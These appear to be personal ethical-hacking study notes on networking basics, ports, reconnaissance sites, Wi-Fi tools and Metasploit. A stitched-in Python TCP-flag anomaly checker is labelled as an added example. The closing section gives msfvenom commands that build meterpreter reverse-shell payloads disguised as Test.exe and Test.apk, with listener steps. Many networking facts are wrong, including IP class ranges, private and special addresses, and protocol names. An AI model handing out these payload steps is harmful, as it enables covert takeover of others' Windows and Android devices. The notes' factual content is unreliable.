Ethical Hacking
A network is defined as a connection between two or more devices that are used to share data.
Types: LAN, WLAN, CAN, MAN, WAN, PAN.
IPv4--
1981
32-bit IP
4.3 million addresses
Numeric decimal notation (192.168.1.1)
Range 0-255
IPv6--
1998
128-bit IP
7.3*10 raised to 28 IP addresses
Alphanumeric hexadecimal notation (2001:db8:3333:4444:5555:6666:7777:8888)
Range 0-9 and A-F
Classes
A:0-126 (used by organisations)
B:128-191 (used by MNC)
C:191-223 (Most common IPs)
D:224-239 (Government registered IPs)
E:240-255 (used for Experiments)
Special IPs:
127.0.0.1 -- Loopback or localhost IP
169.0.0.1 -- APIPA (Automatic Private IP Addressing)
255.0.0.1 -- Broadcasting IPs
Private IPs:
A:10.0.0.1
B:178.16.1.1 To 178.32.1.1
C:192.168.1.1
-----------------------------------------------------------------------------------
----
#Ports (2/Aug)
Port State:
Open
Closed
Filtered (Specific)
Basic Ports
20-21: FTP File Transfer Protocol
22: SSH Secure Shell (Requires authentication)
23: Telnet Teletype Network
25: SMTP Simple Mail Transfer Protocol
53: DNS Domain Name System (Used to link Domain and Domain Name to IPs)
67,68: DHCP Dynamic Host Config Protocol (Provides IPs to newly connected devices)
80: HTTP To host website (Plain Text)
110: POP3 Post Office Protocol
123: NTP N/W Transfer Protocol
135-139: NetBIOS Name Service
143: IMAP4 Internet Message Access Protocol
161-162: SNMP Simple N/W Management Protocol
389: LDAP Lightweight Directory Authentication Protocol
443: HTTPS (Secured) {Uses SSL (Secure Sockets Layer) and TLS (Transport Layer Security) to encrypt data.}
445: Microsoft-DS (Active Directory) / SMB (System Management Block)
2049: NFS N/W File System
3389: RDP Remote Desktop Protocol
5900: VNC Virtual N/W Controller
4444 & 8080: Dynamic Port
-----------------------------------------------------------------------------------
----
#TCP
TCP Flags
SYN:Synchronise
ACK:Acknowledgement
FIN:Finish
RST:Reset
PSH:Push
URG:Urgent
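As an added example (not part of the original notes), the Python sketch below decodes the flag byte of a TCP header into the six flags listed above and notes combinations that a normal TCP stack does not send, which is the kind of check an IDS rule performs. The function names and the sample segments are constructed for illustration.

```python
import struct

# Bit masks for the flag byte (offset 13 of the TCP header), six flags listed above.
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

def build_header(sport, dport, seq, ack, flags):
    """Build a constructed 20-byte TCP header (no options, checksum left at 0)."""
    flag_byte = sum(TCP_FLAGS[name] for name in flags)
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flag_byte, 64240, 0, 0)

def parse_tcp_header(segment):
    """Decode ports, sequence numbers, header length and flag names."""
    if len(segment) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    sport, dport, seq, ack, offset, flag_byte, _win, _csum, _urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    header_len = (offset >> 4) * 4  # data offset counts 32-bit words
    if header_len < 20:
        raise ValueError("data offset below the 20-byte minimum")
    flags = [name for name, bit in TCP_FLAGS.items() if flag_byte & bit]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "header_len": header_len, "flags": flags}

def flag_anomalies(flags):
    """Return reasons a flag combination does not occur in normal TCP traffic."""
    f, notes = set(flags), []
    if not f:
        notes.append("no flags set")
    if {"SYN", "FIN"} <= f:
        notes.append("SYN and FIN together")
    if {"SYN", "RST"} <= f:
        notes.append("SYN and RST together")
    if f & {"FIN", "PSH", "URG"} and "ACK" not in f:
        notes.append("FIN/PSH/URG without ACK")
    return notes

# Constructed sample: a normal three-way handshake followed by two malformed segments.
SAMPLE = [
    build_header(50000, 443, 1000, 0, ["SYN"]),
    build_header(443, 50000, 9000, 1001, ["SYN", "ACK"]),
    build_header(50000, 443, 1001, 9001, ["ACK"]),
    build_header(50001, 443, 2000, 0, ["SYN", "FIN"]),
    build_header(50002, 443, 3000, 0, []),
]

def review(segments):
    """Pair each segment's decoded flags with any anomaly notes."""
    return [(h["flags"], flag_anomalies(h["flags"])) for h in map(parse_tcp_header, segments)]

if __name__ == "__main__":
    for flags, notes in review(SAMPLE):
        print("+".join(flags) or "(none)", "->", "; ".join(notes) or "ok")
```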
1.Application
2.Presentation
3.Session
4.Transport
5.Network
6.Data Link
7.Physical
-----------------------------------------------------------------------------------
----
#Info Gathering
**Websites**
1.Netcraft
2.Wayback Machine
3.DNS Dumpster
4.VirusTotal
5.WHOIS
6.Urlscan.io
7.Shodan (Info About Present Devices)
**Extensions**
1.Wappalyzer
2.Flagfox
3.W3Techs
**IP Info**
Grabify
IP2Location
Google Maps
OSINT Framework
-----------------------------------------------------------------------------------
---
#N/W Scanning
-----------------------------------------------------------------------------------
---
#Enumeration
Def:
The process of extracting user names, machine names, N/W resources, shares and services from a system.
-----------------------------------------------------------------------------------
---
#WIFI Hacking
Tools:
aircrack-ng
aireplay-ng
airodump-ng
Wordlist:
cd /usr/share/wordlists/
Commands:
$ifconfig
$airodump-ng wlan0
----------------------------------------------------------------------------------
#Vulnerability Assessment
3 Terms:
CVE: Common Vulnerability Exposure
CVSS: Common Vulnerability Scoring System
CWE: Common Weakness Assessment
Tools Used:
Nessus Tenable (to find vulnerabilities and CVSS)
Websites:
CVE details
Rapid7
ExploitDB
----------------------------------------------------------------------------------
#Metasploit Framework
7 Modules of MF
1.Exploit :2315
2.Payloads :975
3.Auxiliary :1208
4.Post :412
5.Encoders :46
6.NOPs (NO Operation) :11
7.Evasion :9
Steps To use MF
----------------------------------------------------------------------------------
#GAINING ACCESS & CREATING VENOM
1.Windows 10
steps:
1.Create a VENOM
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Local IP) PORT=4444 -f exe -o Test.exe
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload windows/meterpreter/reverse_tcp
To check sessions
$sessions
$sessions -i (session no)
**************************************************
2.Android
Create a venom
steps:
1.Create a VENOM
$msfvenom -p android/meterpreter/reverse_tcp LHOST=(Local IP) PORT=8080 -o Test.apk
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload android/meterpreter/reverse_tcp